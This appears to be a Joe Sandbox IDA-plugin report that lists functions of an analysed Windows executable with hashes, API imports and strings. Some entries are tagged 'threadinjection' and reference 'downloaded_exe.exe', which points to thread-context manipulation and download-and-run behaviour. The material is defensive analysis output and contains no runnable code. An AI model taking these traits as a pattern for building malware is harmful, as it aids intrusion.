Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb495e440ad794ce6a3a15fbb1ad3f3a3b70adb389507deacf26e2957873038a
Instruction ID: 41a3251597c6413ea65c705a9cd5260af19f1bab42a16b4852130771722f971e
Opcode Fuzzy Hash: fb495e440ad794ce6a3a15fbb1ad3f3a3b70adb389507deacf26e2957873038a
Instruction Fuzzy Hash: 2971F422A0869681EF74EB25904427DA3A0FBC1B48F965531CE6D073E8DF7CD845D3B2

Function 00007FF7FE905DC0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 478f2f235a539d591e7021ec0d09dd2fd92d248d29de88019e58d9f3ce446777
Instruction ID: cb0cdee0d1b0cb70a35c0026485d2a72ddada1cac76d651896539481ea3bcce0
Opcode Fuzzy Hash: 478f2f235a539d591e7021ec0d09dd2fd92d248d29de88019e58d9f3ce446777
Instruction Fuzzy Hash: 0A41AF72B051518BEB24DF3AD408A79BB91FB88B84FC59035DF0983784EA38E541CBA0

Function 00007FF7FE909710 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 054a5dbe9471a283ba5196163799957f6ee46336e60399a3594864f5020b762b
Instruction ID: db63da1f04debe42aeeb87ac3af208a628f857d777a14158692faaa4b7f905a4
Opcode Fuzzy Hash: 054a5dbe9471a283ba5196163799957f6ee46336e60399a3594864f5020b762b
Instruction Fuzzy Hash: 194138B2E0860647E79DCE29E4103693B91E7D4388FE08239DF09467D0CA3D9645CB92

Function 00007FF7FE9B0E80 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e937e599f615a7fe9bb53377588e36dc16eb7e95097b9d6a1c7553075355931f
Instruction ID: f14bc3a362e8e8c020a9498f36cca535d6428c01dc817a5b983e59d5bc21a5ad
Opcode Fuzzy Hash: e937e599f615a7fe9bb53377588e36dc16eb7e95097b9d6a1c7553075355931f
Instruction Fuzzy Hash: A4414232B09A4284E721FF2DE44016DA365EBC97A4F944131EE9C473E1DE2CD582C7B2

Function 00007FF7FE91B040 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075bd50de4fa0eb011b188507e7127e9c30906cbb93caa240e22f3d9d34e0183
Instruction ID: fabbbb6b781dce86b0cadde344116c283f6942d769493eb6f140aaed0ce09766
Opcode Fuzzy Hash: 075bd50de4fa0eb011b188507e7127e9c30906cbb93caa240e22f3d9d34e0183
Instruction Fuzzy Hash: 1B314733B14146CDEB20EE28C01497DB2A2FBC5BA0F959231DA6E03BC4EA2DD844C771

Function 00007FF7FE9B34D0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873ea31d827cc52f4e141d07633b9b5340e9b054ad09580f71eced2f13b2a159
Instruction ID: 44c964c86be11d37701b9e1ad7cb520b3d8a584294770cc07e288fa451f4aa9a
Opcode Fuzzy Hash: 873ea31d827cc52f4e141d07633b9b5340e9b054ad09580f71eced2f13b2a159
Instruction Fuzzy Hash: 9D21B276B06B5889DB10DFAAE8850ED37B8FB4DBCCB501126EE9D53B59DF38C1508290

Function 00007FF7FE91C000 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e409ab3ad31ebf7b0480acd9aa3ef814aa1831338b0f3f57a9d2ecb3270b2c2d
Instruction ID: 32fc51f6748c36ba49ea551b4f387cf81f22ac0e8c4367c4bb77cc45cd673bda
Opcode Fuzzy Hash: e409ab3ad31ebf7b0480acd9aa3ef814aa1831338b0f3f57a9d2ecb3270b2c2d
Instruction Fuzzy Hash: CDF0A4B3A19A4489CB20EF2AE44006DE7A4FB9CFD4BA49131EE8D13758CE3CD480CB51

Function 00007FF7FE916B79 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d43ca461c0f0a1d9bb4b0e51a43f2994457bb98b808e39c2210b9482a0e13e6
Instruction ID: 7413f08093d234056ec39c63a2f1eea998206a7cf2ee82f91986b8eae5b5c056
Opcode Fuzzy Hash: 4d43ca461c0f0a1d9bb4b0e51a43f2994457bb98b808e39c2210b9482a0e13e6
Instruction Fuzzy Hash: A4F0AABAA09B0081CA04EF86E49023CB7B8F7C9F90B11A235DA9D83751DF34C4A0C364

Function 00007FF7FE9EE6A8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5338b2410c88fadbddd5476d659243740ef45eec0dfff78edda5a85c0f4bb367
Instruction ID: 3b4ce7b0595b609c05ce36711f18ddd882364cda1631138cb1376bbe46678700
Opcode Fuzzy Hash: 5338b2410c88fadbddd5476d659243740ef45eec0dfff78edda5a85c0f4bb367
Instruction Fuzzy Hash: 6DD0C98BE4EEC345F25291A40D2D118AAD19F92D24B4C827ACF78072D2994A6C0253B3

Function 00007FF7FE90A6B9 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3ff3fd33715618c8a4079a48052eb85f1922e7db2ecb700b4b243b3cca65f43
Instruction ID: 6f835f59eb62a757ff08f187b724a3474cf0bc931323e4bc108ab6c3063a0934
Opcode Fuzzy Hash: d3ff3fd33715618c8a4079a48052eb85f1922e7db2ecb700b4b243b3cca65f43
Instruction Fuzzy Hash: C1A00216D5EC51A8E3005B05DC4A1B0A538D746700F442030C93C62091896C91404176

Function 00007FF7FE911A90 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 116fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FF7FE911BA8

Part of subcall function 00007FF7FE8FE770: strlen.MSVCRT ref: 00007FF7FE8FE809
Part of subcall function 00007FF7FE8FE770: memcpy.MSVCRT ref: 00007FF7FE8FE822
Part of subcall function 00007FF7FE8FE770: free.MSVCRT ref: 00007FF7FE8FE82D

fwrite.MSVCRT ref: 00007FF7FE911B1A
fputs.MSVCRT ref: 00007FF7FE911B34
fwrite.MSVCRT ref: 00007FF7FE911B55
free.MSVCRT ref: 00007FF7FE911B65
fputs.MSVCRT ref: 00007FF7FE911B81
abort.MSVCRT ref: 00007FF7FE911BB7
fwrite.MSVCRT ref: 00007FF7FE911BDC
fwrite.MSVCRT ref: 00007FF7FE911C26
fputs.MSVCRT ref: 00007FF7FE911C38
fputc.MSVCRT ref: 00007FF7FE911C4C

Strings

what(): , xrefs: 00007FF7FE911C1F
terminate called recursively, xrefs: 00007FF7FE911BD2
terminate called after throwing an instance of ', xrefs: 00007FF7FE911B0A
terminate called without an active exception, xrefs: 00007FF7FE911B9E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fwrite$fputs$free$abortfputcmemcpystrlen
String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 360841300-808685626
Opcode ID: 09b679a88b2f4d12fd2304eb4c2704d257785ce5fd89ebe4ffe3607b20a4ca59
Instruction ID: fc7dd42c2c52993d5b59b3e347f5be72d7a3dc3f1f27e3d456eded238ef3836f
Opcode Fuzzy Hash: 09b679a88b2f4d12fd2304eb4c2704d257785ce5fd89ebe4ffe3607b20a4ca59
Instruction Fuzzy Hash: 48418B21B181064AFB10F776A8153BDA691AFD5B90FC44036DA6D077D6EE2CE60183F3

Function 00007FF7FE90CB70 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 87libraryloadermemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FE90C4E0: calloc.MSVCRT ref: 00007FF7FE90C587

TlsAlloc.KERNEL32 ref: 00007FF7FE90CBAD
abort.MSVCRT(?,?,00007FF7FE9ED210,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBEB6
abort.MSVCRT(?,?,00007FF7FE9ED210,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBEBC
GetModuleHandleA.KERNEL32 ref: 00007FF7FE9BBF0D
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBF2C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBF3F

Strings

once %p is %ld, xrefs: 00007FF7FE90CBFE
AddVectoredExceptionHandler, xrefs: 00007FF7FE9BBF22
kernel32.dll, xrefs: 00007FF7FE9BBF06
RemoveVectoredExceptionHandler, xrefs: 00007FF7FE9BBF2E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: AddressProcabort$AllocHandleModulecalloc
String ID: once %p is %ld$AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
API String ID: 3654027789-2209695033
Opcode ID: e55999711f3c20bac60c7bd199629c18f9a1f4d27c8d29c52fe010fa216aa6ae
Instruction ID: abffc39f8e9754993c498319054943621d2c41ff3d19da09762761c8bfd47dbd
Opcode Fuzzy Hash: e55999711f3c20bac60c7bd199629c18f9a1f4d27c8d29c52fe010fa216aa6ae
Instruction Fuzzy Hash: DE314F22E4960685EB15FB29BC412B8A3A4BF85794FC41531CE6D033E1EE6CA585C7B3

Function 00007FF7FE90C720 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 49libraryloadermemoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00007FF7FE90C724
abort.MSVCRT ref: 00007FF7FE9BBEB0
abort.MSVCRT(?,?,00007FF7FE9ED210,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBEB6
abort.MSVCRT(?,?,00007FF7FE9ED210,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBEBC
GetModuleHandleA.KERNEL32 ref: 00007FF7FE9BBF0D
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBF2C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7FE90DC19,?,?,?,?,00007FF7FE91019F), ref: 00007FF7FE9BBF3F

Strings

AddVectoredExceptionHandler, xrefs: 00007FF7FE9BBF22
kernel32.dll, xrefs: 00007FF7FE9BBF06
RemoveVectoredExceptionHandler, xrefs: 00007FF7FE9BBF2E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: abort$AddressProc$AllocHandleModule
String ID: AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
API String ID: 129120984-3889795909
Opcode ID: a0ce59691ba87a61d30617f6eaac9ef6bb4904eb2baec1a7360eae744de776aa
Instruction ID: 6031b2bff538be66fb807ede7289300d00afb3616c94dcee4a6fa9783a97a60a
Opcode Fuzzy Hash: a0ce59691ba87a61d30617f6eaac9ef6bb4904eb2baec1a7360eae744de776aa
Instruction Fuzzy Hash: 00113C25E1AB0685EB00FB29BC81268B3A0BF89744FC01531DA6C433F1EE2CE14587B2

Function 00007FF7FE8FFB80 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF7FE8FFC55
abort.MSVCRT(?,?,?,?,?,?,?,00000000,00007FF7FE9ED0B8,?,?,00007FF7FE9ED210,00007FF7FE9BAE85), ref: 00007FF7FE8FFC5B
RtlUnwindEx.KERNEL32 ref: 00007FF7FE8FFD71

Strings

CCG", xrefs: 00007FF7FE8FFBE2
CCG!, xrefs: 00007FF7FE8FFBA9
CCG , xrefs: 00007FF7FE8FFBEE
CCG!, xrefs: 00007FF7FE8FFC48

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: 35324f88417dd6d36fe7314d1056601820944679946b7d6da8b3c44f44ef223c
Instruction ID: 318825470e7b2e2bbe0bffb881ed5153041c4b813545b3bcb8aa14f982ff2f30
Opcode Fuzzy Hash: 35324f88417dd6d36fe7314d1056601820944679946b7d6da8b3c44f44ef223c
Instruction Fuzzy Hash: CB51B133A18B9082E760AB15E4806ADB360F799B88F945236EFAD13798DF3CD491C754

Function 00007FF7FE90E110 Relevance: 15.2, APIs: 10, Instructions: 191threadinjectionsynchronizationCOMMON

Download Yara Rule

APIs

GetHandleInformation.KERNEL32 ref: 00007FF7FE90E17D

Part of subcall function 00007FF7FE90CB70: TlsAlloc.KERNEL32 ref: 00007FF7FE90CBAD

TlsGetValue.KERNEL32 ref: 00007FF7FE90E1A2
SetEvent.KERNEL32 ref: 00007FF7FE90E1EA
SetEvent.KERNEL32 ref: 00007FF7FE90E25A
SuspendThread.KERNEL32 ref: 00007FF7FE90E2AC
WaitForSingleObject.KERNEL32 ref: 00007FF7FE90E2B8
GetThreadContext.KERNEL32 ref: 00007FF7FE90E2D5
SetThreadContext.KERNEL32 ref: 00007FF7FE90E2F1
SetEvent.KERNEL32 ref: 00007FF7FE90E319
ResumeThread.KERNEL32 ref: 00007FF7FE90E32B

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Thread$Event$Context$AllocHandleInformationObjectResumeSingleSuspendValueWait
String ID:
API String ID: 1746956495-0
Opcode ID: c382b555be9afc52b16fe4d13812a23d695e1a166d76a8dde764e31364a8784d
Instruction ID: 15e42c7a5b7ed477b2dfbee55ba81027f8f3a6d34ce6c20372b88fd3a4642534
Opcode Fuzzy Hash: c382b555be9afc52b16fe4d13812a23d695e1a166d76a8dde764e31364a8784d
Instruction Fuzzy Hash: 15812122A0964285FF65FB359800378ABA0AFC5BA4FD84631DF3D462D5DF6CE54182B3

Function 00007FF7FE90ABB0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 204synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FE90DB80: TlsGetValue.KERNEL32 ref: 00007FF7FE90DB8F

Part of subcall function 00007FF7FE90BC40: WaitForMultipleObjects.KERNEL32 ref: 00007FF7FE90BCC5

ResetEvent.KERNEL32 ref: 00007FF7FE90AC33

Part of subcall function 00007FF7FE90DEF0: TlsGetValue.KERNEL32 ref: 00007FF7FE90DF01

WaitForSingleObject.KERNEL32 ref: 00007FF7FE90AC67

Strings

downloaded_exe.exe, xrefs: 00007FF7FE90AE60, 00007FF7FE90AE6B

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: ValueWait$EventMultipleObjectObjectsResetSingle
String ID: downloaded_exe.exe
API String ID: 2327612466-1849240386
Opcode ID: 1a72ea353dc8e90835a112ed87cffda937ed6100cf1dde60f418385940ef24e7
Instruction ID: 15309bb2854a22985c9480f03ed3ba9576e364565201325a579a81de4084bbbd
Opcode Fuzzy Hash: 1a72ea353dc8e90835a112ed87cffda937ed6100cf1dde60f418385940ef24e7
Instruction Fuzzy Hash: 87612833E0862686FBA0F736580527AE185AFD4795FD54031DF2E866D1EDACE84182F3

Function 00007FF7FE922E20 Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 314stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE922E63
strlen.MSVCRT ref: 00007FF7FE922F03

Strings

basic_string: construction from null is not valid, xrefs: 00007FF7FE9230D7, 00007FF7FE92312E, 00007FF7FE92317E
basic_string: construction from null is not valid, xrefs: 00007FF7FE922EA6, 00007FF7FE922F46, 00007FF7FE922FE6

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

